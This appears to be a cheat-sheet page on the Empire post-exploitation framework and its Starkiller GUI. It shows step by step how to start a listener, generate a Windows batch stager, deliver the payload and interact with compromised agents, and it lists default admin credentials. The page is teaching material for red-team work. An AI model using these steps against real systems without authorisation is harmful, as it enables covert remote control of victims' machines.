⭕Empire & Starkiller

Last updated 2 years ago

Intro

Empire is a post-exploitation framework that includes a pure-PowerShell2.0 Windows agent, and a pure Python 2.6/2.7 Linux/OS X agent. It is the merge of the previous PowerShell Empire and Python EmPyre projects.

Installation

on kali and parrot:

apt install powershell-empire

other distro:

git clone https://github.com/EmpireProject/Empire.git

sudo ./setup/install.sh

# or use docker image:
docker pull empireproject/empire

Basic Usage

agents - Will allow you to jump to agents menu.
back & main – Will take you back to the main menu.
exit – Will exit from Empire.
help – Will display help menu as shown in the above image.
info – Will display information about the active listener.
kill – Will kill a particular listener.
launcher – Used to generate an initial launcher for a listener.
list – Will list all the active listeners.
usestager – Used to use a stager (we will see below what exactly is a stager).
uselistener – Used to start a listener module.

run empire server and client:

powershell-empire server
powershell-empire client

list/use listeners:

(Empire) > listeners
(Empire: listeners) > uselistener meterpreter
(Empire: listeners/meterpreter) > info

set listener options and start it:

(Empire: listeners/meterpreter) > set name meterp
(Empire: listeners/meterpreter) > set port 5555
(Empire: listeners/meterpreter) > execute

list/use stagers:

(Empire) > usestager
(Empire) > usestager windows/launcher_bat
(Empire: stager/windows/launcher_bat) > set Listener meterpreter
(Empire: stager/windows/launcher_bat) > execute
        [*] Stager output written out to: /tmp/launcher.bat

send the payload and wait for agents:

(Empire) > agents
(Empire: agents) >  list
(Empire: agents) > interact [agent id]

use post-exploitation modules:

(Empire: agents) > usemodule
(Empire: agents) > usemodule external/generate_agent
(Empire: external/generate_agent) > options
Empire: external/generate_agent) > set Listener http
(Empire: external/generate_agent) > set Language powershell
(Empire: external/generate_agent) > execute

Starkiller

Graphical interface for empire client:

install and run starkiller:

apt install starkiller
powershell-empire server
starkiller

default credentials:

username: empireadmin
 password: password123

Intro

Installation

Basic Usage

Starkiller

In-Depth Usage